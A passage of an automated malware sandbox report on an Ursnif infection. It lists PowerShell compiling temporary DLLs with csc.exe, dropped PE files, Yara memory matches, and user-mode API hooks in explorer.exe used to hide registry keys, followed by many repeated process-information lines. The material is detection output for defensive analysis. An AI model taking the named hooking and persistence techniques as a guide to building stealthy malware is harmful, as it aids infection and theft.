Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\loaddll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
